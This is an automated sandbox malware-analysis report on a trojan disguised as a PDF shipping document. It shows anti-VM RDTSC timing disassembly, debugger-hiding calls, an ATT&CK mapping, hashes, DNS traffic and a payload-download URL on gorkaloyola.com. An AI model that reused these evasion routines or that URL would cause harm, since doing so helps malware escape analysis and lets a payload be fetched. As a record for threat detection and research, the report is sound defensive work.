RDTSC instruction interceptor: First address: 0000000002327105 second address: 0000000002327105 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0EA0C74CD8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 dec dword ptr [ebp+000000F8h] 0x00000027 jmp 00007F0EA0C74D16h 0x00000029 test ah, ah 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0EA0C74C74h 0x00000034 call 00007F0EA0C74D41h 0x00000039 call 00007F0EA0C74CEAh 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Shipping Document INVPLBL_pdf.exe, 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	RDTSC instruction interceptor: First address: 0000000002327105 second address: 0000000002327105 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0EA0C74CD8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 dec dword ptr [ebp+000000F8h] 0x00000027 jmp 00007F0EA0C74D16h 0x00000029 test ah, ah 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0EA0C74C74h 0x00000034 call 00007F0EA0C74D41h 0x00000039 call 00007F0EA0C74CEAh 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	RDTSC instruction interceptor: First address: 0000000002327127 second address: 0000000002327127 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0EA083855Eh 0x0000001f popad 0x00000020 call 00007F0EA0837FE4h 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	RDTSC instruction interceptor: First address: 0000000000567127 second address: 0000000000567127 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0EA0C7539Eh 0x0000001f popad 0x00000020 call 00007F0EA0C74E24h 0x00000025 lfence 0x00000028 rdtsc

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Code function: 0_2_02320A6B rdtsc

0_2_02320A6B

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: NtSetInformationThread,EnumServicesStatusA,	10_2_0056861B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568664
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_005687F8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_005687AC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568840
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_0056886F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_005688C8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568910
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_005689B0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568A00
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568B78
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568BA6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: EnumServicesStatusA,	10_2_00568C48

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Code function: 0_2_02324046 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000

0_2_02324046

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Code function: 0_2_02320A6B rdtsc

0_2_02320A6B

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Code function: 0_2_02324E5C LdrInitializeThunk,

0_2_02324E5C

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232217F mov eax, dword ptr fs:[00000030h]	0_2_0232217F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02326722 mov eax, dword ptr fs:[00000030h]	0_2_02326722
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02327A40 mov eax, dword ptr fs:[00000030h]	0_2_02327A40
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322B0C mov eax, dword ptr fs:[00000030h]	0_2_02322B0C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322B58 mov eax, dword ptr fs:[00000030h]	0_2_02322B58
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323BA8 mov eax, dword ptr fs:[00000030h]	0_2_02323BA8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232289C mov eax, dword ptr fs:[00000030h]	0_2_0232289C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023279F9 mov eax, dword ptr fs:[00000030h]	0_2_023279F9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02326D75 mov eax, dword ptr fs:[00000030h]	0_2_02326D75
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_0056217F mov eax, dword ptr fs:[00000030h]	10_2_0056217F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00566722 mov eax, dword ptr fs:[00000030h]	10_2_00566722
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_0056289C mov eax, dword ptr fs:[00000030h]	10_2_0056289C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_005679F9 mov eax, dword ptr fs:[00000030h]	10_2_005679F9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00567A40 mov eax, dword ptr fs:[00000030h]	10_2_00567A40
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562B58 mov eax, dword ptr fs:[00000030h]	10_2_00562B58
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562B0C mov eax, dword ptr fs:[00000030h]	10_2_00562B0C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00563BA8 mov eax, dword ptr fs:[00000030h]	10_2_00563BA8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00566D75 mov eax, dword ptr fs:[00000030h]	10_2_00566D75

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Process created: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'

Jump to behavior

Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596423600.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596423600.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596423600.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596423600.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Code function: 0_2_02326A99 cpuid

0_2_02326A99

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery721	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Service Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Shipping Document INVPLBL_pdf.exe	31%	Virustotal		Browse
Shipping Document INVPLBL_pdf.exe	19%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
gorkaloyola.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://gorkaloyola.com/cashout/Kalied_zgFWOmD234.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gorkaloyola.com	192.185.170.106	true	false	0%, Virustotal, Browse	unknown
g.msn.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://gorkaloyola.com/cashout/Kalied_zgFWOmD234.bin	Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323820
Start date:	27.11.2020
Start time:	15:47:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Shipping Document INVPLBL_pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@3/0@2/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.6% (good quality ratio 0.5%) Quality average: 36.2% Quality standard deviation: 21.3%
HCA Information:	Successful, ratio: 88% Number of executed functions: 209 Number of non-executed functions: 9
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.255.188.83, 51.104.139.180, 40.67.251.132, 52.155.217.156, 20.54.26.129, 52.142.114.176, 92.122.213.194, 92.122.213.247, 23.210.248.85, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.089976510884923
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipping Document INVPLBL_pdf.exe
File size:	86016
MD5:	40e23535eaeb38100848d2544f29425d
SHA1:	115391590b015b30e742095c3355b63f4ae29335
SHA256:	f76e242ad82adab98e38fbdcc1469a7066031c5345d4904035d545713355629d
SHA512:	981249b64fb0d86ae22f45a669d209605cb4d0dd17bbd440685f9dc161bfc7754e2c47f4620cf3b91d29ef8ffcc30c7f8548e0b755b4048ab89f63c6882d625d
SSDEEP:	768:JzJPpJ4xUMiQj1tKl6IfWRGt55Pi5G2wVHRyEkP:Jzl421K1tKlDQGtau
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...C.TN.....................@............... ....@................

File Icon


Icon Hash:	e9e1c5c9d5d9d1aa

Static PE Info

General
Entrypoint:	0x40120c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4E54D443 [Wed Aug 24 10:36:51 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d1e6b215baa9cbbcb95c5c9eee80175d

Entrypoint Preview

Instruction
push 0040297Ch
call 00007F0EA0728FB3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+3A5E7E9Ch], bh
and eax, CAAC4075h
dec ebp
cmpsd
mov esi, 002543FEh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx+00h], al
push es
push eax
add dword ptr [ecx], 50h
jc 00007F0EA0729031h
push 00000065h
arpl word ptr [ecx+esi+00h], si
add byte ptr [eax], al
add ah, al
sub dword ptr [edx], ecx
add eax, dword ptr [eax]
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
sub al, 30h
mov al, byte ptr [A282ECD9h]
out dx, eax
dec ebp
xchg eax, ecx
mov bl, 95h
mov ah, 3Ch
sbb ah, byte ptr [eax-68h]
loop 00007F0EA0728F69h
retf 0F39h
sti
mov word ptr [ebp+ebx*4-56h], es
mov al, byte ptr [CDA1847Fh]
fstp tbyte ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x111c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x119e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xc0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10580	0x11000	False	0.425680721507	data	5.67635669522	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x12000	0x1150	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x119e	0x2000	False	0.219116210938	data	2.9662217016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x148f6	0x8a8	data
RT_ICON	0x1438e	0x568	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1436c	0x22	data
RT_VERSION	0x14120	0x24c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaBoolStr, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaI2Str, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaFPInt, _CIexp

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Skaget
FileVersion	2.00
CompanyName	Madrigal Corp
Comments	Madrigal Corp
ProductName	Project1
ProductVersion	2.00
OriginalFilename	Skaget.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 15:48:21.044915915 CET	58384	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:21.082891941 CET	53	58384	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:22.241636038 CET	60261	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:22.268754005 CET	53	60261	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:23.654417038 CET	56061	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:23.681477070 CET	53	56061	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:25.483433008 CET	58336	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:25.510389090 CET	53	58336	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:26.202280998 CET	53781	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:26.229373932 CET	53	53781	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:27.250709057 CET	54064	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:27.277700901 CET	53	54064	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:28.031394005 CET	52811	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:28.058437109 CET	53	52811	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:28.713527918 CET	55299	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:28.740658045 CET	53	55299	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:30.389445066 CET	63745	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:30.425527096 CET	53	63745	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:31.447170019 CET	50055	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:31.482527971 CET	53	50055	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:32.112328053 CET	61374	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:32.139417887 CET	53	61374	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:32.868566990 CET	50339	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:32.895838022 CET	53	50339	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:34.463712931 CET	63307	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:34.491255999 CET	53	63307	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:35.195472002 CET	49694	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:35.222491980 CET	53	49694	8.8.8.8	192.168.2.6
Nov 27, 2020 15:48:45.788101912 CET	54982	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:48:45.815256119 CET	53	54982	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:06.379210949 CET	50010	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:06.416075945 CET	53	50010	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:13.421981096 CET	63718	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:13.457546949 CET	53	63718	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:14.304552078 CET	62116	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:14.342350006 CET	53	62116	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:14.780752897 CET	63816	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:14.818800926 CET	53	63816	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:15.112642050 CET	55014	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:15.148348093 CET	53	55014	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:15.565212965 CET	62208	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:15.592267990 CET	53	62208	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:15.980247974 CET	57574	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:16.015897036 CET	53	57574	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:16.489033937 CET	51818	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:16.530077934 CET	53	51818	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:17.026971102 CET	56628	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:17.062434912 CET	53	56628	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:17.666729927 CET	60778	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:17.693818092 CET	53	60778	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:18.044378996 CET	53799	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:18.079725027 CET	53	53799	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:18.969459057 CET	54683	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:19.005215883 CET	53	54683	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:21.326265097 CET	59329	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:21.361706018 CET	53	59329	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:26.910702944 CET	64021	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:26.946363926 CET	53	64021	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:44.968725920 CET	56129	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:45.004426956 CET	53	56129	8.8.8.8	192.168.2.6
Nov 27, 2020 15:49:50.758688927 CET	58177	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:49:50.794290066 CET	53	58177	8.8.8.8	192.168.2.6
Nov 27, 2020 15:50:09.024199009 CET	50700	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:50:09.051368952 CET	53	50700	8.8.8.8	192.168.2.6
Nov 27, 2020 15:50:25.283133030 CET	54069	53	192.168.2.6	8.8.8.8
Nov 27, 2020 15:50:25.445837975 CET	53	54069	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 15:49:21.326265097 CET	192.168.2.6	8.8.8.8	0xea1	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
